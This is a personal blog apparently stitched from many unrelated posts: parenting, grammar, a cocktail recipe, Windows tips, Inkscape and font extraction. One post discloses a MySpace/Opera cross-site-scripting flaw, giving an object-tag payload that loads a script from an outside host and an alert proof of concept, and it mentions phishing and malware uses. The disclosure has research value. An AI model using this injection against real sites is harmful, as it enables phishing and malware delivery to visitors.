digip : sailing the high seas of the internet

In todays economy, any way you can save money helps. Even if it means resorting to a little “MacGyverism” in the field of parenting. Diapers are a costly necessity, and any parent can tell you, they tend to break right around the tape bands. Often when you have a low supply of diapers to work with.

Here is where the MacGyverism comes in. Exhibit “A”. My daughter Audrey. I was changing here diaper, when the the tape band on her new one ripped off entirely. MacGyver to the rescue!

Now, I know it doesn’t exactly match the color of here diaper, but hey, throwing it out and using a new one is not an option!

I often mangle the English language. I even misspell words regularly. Sometimes it is to prove a point, but most of the time, because I’m too lazy to spell check and reread what I post. But for the most part, I try to at least use words properly and in the correct context. When I see that someone has gone much further than I have with this, and taken it to a level of broken English as such that requires them to go back to grade school to understand what the hell they did wrong, I must speak out.

Especially when I find it among the IT/computer geek/hacker community. Only because I know how they rag on people in forums for such bad grammar and use of “1337 sPe@K”, I find it not only wrong for them to rag on others, but funny when I catch them doing it themselves.

In reference to this blog posts title, one such paragraph on someone elses blog caught my attention. Now, I have nothing against the author, nor do I even know him. It just seems that even he could have made a more coherent English sentence than he has on his one blog post.

Below is a copy and paste of his original post.

The first time I ever head of zipcars(www.zipcar.com) was from watch a ted podcast. I really loved to concept of car sharing and more importantly I really wanted to know how they handle the hand off of the car from one person to the next. Anyway I saw one today, I thought sense I lived in Atlanta I would never see one of these things. Here is the pic.

Here are my corrections:

I’m sorry, but there are a bunch misspelled words in that paragraph above as well as improper grammar.

Its “heard”, not “head”, that is unless you are receiving or giving head.

“was from watch a ted podcast” should have been maybe “watching” instead of watched, or better yet, “The first time I ever saw a Zipcar was while watching a Ted podcast.”

That is unless it was an audio podcast, then “heard” would have been fine, but you don’t “watch” an audio podcast by hearing. You “watch” by seeing.

“I really loved to concept of car sharing” maybe should have said,
“I really love the concept of car sharing”. Not “to” and not “loved”, as in past tense.

“I thought sense I lived in Atlanta” should have said, “since” instead of “sense”.

Thank you, this has been a spell check by your friendly neighborhood Spiderman.

Now, I know I sound like a pretentious snob, and maybe a bit of an ankle biting troll. I really don’t care though, as I have been awake over 24hours, had a bad day at work yesterday, and needed to find some way of venting my frustration. Even if only temporary short sightedness brings me to the conclusion that I sound like a total dick right now, it was worth the post.

I may have misspelled or even missued words in this post, but I at least made an attempt to fix them.

Or is there only the “Flying Spaghetti Monster”?

http://www.venganza.org/about/open-letter/

You decide, but what ever you do, understand what this really means. Even if it is a silly web page…

I know Christmas is over, but the New Year is upon us. If you are out drinking tonight, or at home with family, you can make yourself a nice mixed drink I came up with a few years ago. Named after my daughter Quinn, here is the drink:

Quinn’s Christmas Cordial
(Tastes like a Chocolate covered Cherry with Hint of Almonds)
1 1/2 shot Disaronno Amaretto
1 shot Kahlua® Especial coffee liqueur (100% Arabica Beans)
6-8 oz Cherry Coke (Depending on your desired alcohol content)
Stir slowly. Add Ice if desired.

I have to say, even with all the cool stuff I got for Christmas this year, one of those items being a 26inch HDTV from my mother, it seems kind of overkill. Selfish even. I mean, with todays economy, and knowing what money I have for bills, I almost don’t want all this stuff, because I know what it costs, and I know the people who bought it don’t have the money for this stuff either. It’s not responsible gift giving/shopping in my mind.

It’s like an extra layer of guilt, or pressure added to my every day life. Like, where the hell am I going to put all this stuff, most of which I can live without in the first place! Also, when my work closes, and I need to move, it just adds that much more I have to pack and deal with. I plan on shedding a large portion of my belongings to begin with and free myself from these attachments. Now I have that much more to decide what to get rid of.

I’m thankfull for the gifts, but some of them are just a bit too much. I can live without the large screen tv. I have a decent 19inch HD monitor for my pc, as well as an HD Tuner for the pc, so the TV is really just eye candy to me, and takes up too much space. It’s also something that just screams “spoiled” to me, and I have that. I don’t wear the major name brand things, so don;t buy me expensive clothes. I’m a jeans and tshirt kind of guy, who has nice threads for special occasions, but for the most part I don’t care about the mainstream stuff people go crazy for. I don’t want or need it, nor do I like the idea of attachment to material these things.

I have my core items that I feel are not just “wants” but are things that I use regularly and find usefull for every day life. I have my guitars, my pc, 1 vehicle(for all of us), 1(now 2) tv(s), a dvd player and movies and that’s pretty much it. About the only things I can added which we have are the bed, couch, phone and maybe stuff like the fridge and stove. All the rest of this stuff, I need to get rid of it. Shed all the uneeded crap from my life and rid this weight from material things that is holding us down.

I often find that for whatever reason, photoshop seems to lock psd files from being able to be moved or deleted. Well, it turns out that this is probably a bug between photoshop 7 and windows Explorer.exe

A lot of people talk about using the program “unlocker” to fix issues of “error deleting file or folder”, “cannot delete folder: it is used by another person or program”, etc, and while this program does work, I found that you can basically get the same results using Process Explorer from Sysinternals(now owned by Microsoft).

If you already have Process Explorer on your system, one way to try to “unlock” a stubborn file that won’t let you move or delete it is to search for the file name and then close any handles that have it open. To do this, first close any programs that may have the file open. Then in process explorer, enable the lower pane and set it to view handles(Use the dll/handles toggle icon on the toolbar). Now click “Find” on the menu of process explorer and then find handle or dll. Enter the name of the file(you do not need the entire path, just the file name and extension) and you will see it show up in the bottom pane window. You should now be in the handles for Explorere.exe. If so, right click the highlighted handle, and select “close handle”. Click yes to confirm. Now, go back the file and try to move or delete it. You should now be able to do what you want with the file!

Inkscape

If you use Adobe Illustrator to design Vector images, or have tried it but can’t afford to buy a full licensed copy, check out Inkscape. Its a free open source alternative to Illustrator which gives you many of the same abilities as Adobe Illustrator. It’s also a multi-platform app, with versions for Mac, linux and Windows!

I have been getting a lot of spam(automated trackback/pingback) from a site called digwe.com

My blog post had barely been online a few hours, and I started receiving trackbacks from their site, only, it was in categories like, auto loans, security products, etc, that had NOTHING to do with my blog post. After a little googling, it seems they are kind of like a digg site, only, instead of people posting things to digg, they content spam the blogs they link to with junk unrelated to the orginal blog post.

Has anyone else had this problem with digwe? What are your opinions of Digwe? As of right now, I have it banned.

I noticed there is a flaw in how MySpace handles the object tag when posting videos and such. With a little experimenting, I found it was possible to insert an iframe into any myspace page, comment, message, etc. The way the flaw works is in how both MySpace and Opera handle the object tag. MySpace is really the one responsible here, as they fail to sanitize the input from users, and allow them to include the data element of the object tag.

If a user posts something to My Space in the form of:

< object data=”http://www.yoursite.com/alert.html” width=”200″ height=”200″ > < /object >

My Space will try to format the output as an Adobe Flash Document. Here is the what My Space converts the above OBJECT data into:

< object type=”application/x-shockwave-flash” allowScriptAccess=”never” allowNetworking=”internal” height=”0″ width=”0″ data=”http://www.yoursite.com/alert.html” >
< param name=”allowScriptAccess” value=”never” / >
< param name=”allowNetworking” value=”internal” / >
< param name=”movie” value=”http://www.yoursite.com/alert.html” / >
< /object >

What ends up happening though, is My Space does not sanitize the output and leaves the DATA=URL intact, allowing whatever page is linked, to be embedded into a persons profile,comments, messages, bulletin posts, etc. On the other end, the alert.html file only needs to contain one line of code to execute a script:

< script type=”text/javascript” src=”http://www.yoursite.com/alert.js” > < /script >

Within the alert.js file I have done a proof of concept test and added the following code:

alert (“Welcome to My Space. If you can see this, it’s because My Space is vulnerable to XSS attacks.”);

Now, most browsers will look at the OBJECT data and ignore the output since it is not trying to load an actual Flash document in the manner in which My Space has changed it. Fire Fox, Internet Explorer, and Safari do nothing with the above code, but Opera on the other hand will load the data from the linked off site URL. What happens is that any Javascript from the foreign site linked by DATA=URL will execute for any visitors if they are using the Opera Web Browser.

I have tested this on multiple computers running Opera, as well as the Linux and Windows operating systems(I assume the same will work on Mac OSX under Opera), so it would seem that the flaw relies on two components. One being the user visiting the page is running Opera, and the other, My Space allowing the linked DATA=URL in their OBJECT tags. Since My Space will auto format the output into an Adobe Flash Object without removing the DATA=URL field they are putting their users at risk.

Now, given the above example, this seems to be limited to a flaw in Opera, but this flaw only works because of both My Space and Opera combined. The operating system does not seem to be a factor. Here is a screen shot of the flaw at work on Ubuntu using the Opera Web Browser: XSS_Flaw

It’s not hard to think of what someone could do to an unsuspecting visitor. With a little PHP you can redirect the entire page, set up a fake login and make the user think they were logged out of myspace, potentially phishing their password in the process. Others might be using offshore malware sites that would like to infect the user via chained iframes over many different sites, compromising more than just their myspace account, but also their PC.

The above flaw will also work in other browsers like Internet Explorer, Fire Fox, etc, if kept in the original format of <object data=”http://www.yoursite.com/alert.html” width=”200″ height=”200″> </object>
Mypace just happens to break the code for most browsers except Opera.

I was working on a project that required me to have a nice Chinese Unicode font. I wanted to copy some text from a webpage, but I didn’t have the required font to see the characters. In fact, I didn’t have anything that could display the symbols on the website I was trying to copy them from, but I knew the text was there. Then it hit me, Adobe has a lot of fonts you can download and install for Acrobat (only, I don’t have or use Acrobat).

http://www.adobe.com/ap/products/acrobat/acrrasianfontpackthanks.html?hasjavascript=0&Version=Adobe+Reader+8&Language=Chinese+Simplified&Platform=Windows

After downloading the file from Adobe, they want to use an msi installer to make use of the damn fonts. Why on earth do I need to use this to install a font? It’s just a font. They do this because they have this thing packaged with over 60 other files they want to put on your pc, and for what, I have no clue. I am always leary of programs that use installers like this to add craptastic amounts of other stuff you will never need. All I wanted was the damn font file itself! So, instead of “installing” it using the msi package, I grabbed my trusty 7zip, opened the archive inside, browsed for the font files themselves (located in data1.cab file) and extracted the “otf” files to my desktop. (OTF = Open Type Font). All I had to do now was open the windows font folder and drag them over to install them. Now delete the fonts and msi package off your desktop. Done.

You are now ready to use the new fonts in any of your programs, like your web browser or photoshop(which is why I wanted it in the first place).